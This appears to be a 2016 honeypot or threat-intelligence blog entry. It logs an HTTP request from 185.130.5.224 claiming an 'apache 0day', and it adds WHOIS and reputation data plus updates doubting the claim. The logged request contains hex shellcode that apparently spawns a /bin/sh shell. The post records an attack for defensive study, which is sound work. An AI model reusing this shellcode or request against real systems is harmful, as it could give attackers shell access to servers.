Freitag, 1. Januar 2016

185.130.5.224 - apache 0day by @hxmonsegur [Update1 - 05/01/2016]

BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/&#736%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*

31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c95 1516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031
c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0
b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd
8031c0b001cd80

 END OF DATA

185.130.5[.]224

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.224
  • BGP Prefix : 185.130.5.0/24
  • CC : LThttps://www.blogger.com/blogger.g?blogID=7778406999173736079#editor/target=post;postID=5908088170526748213
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.224

UPDATE:
The vulnerability (if it exists and is not just a marketing idea to push twitter follower) is not reflected by any entry in exploit-db.com or 0day.today

UPDATE 2: (Thanks to@DanielRufde)

 https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0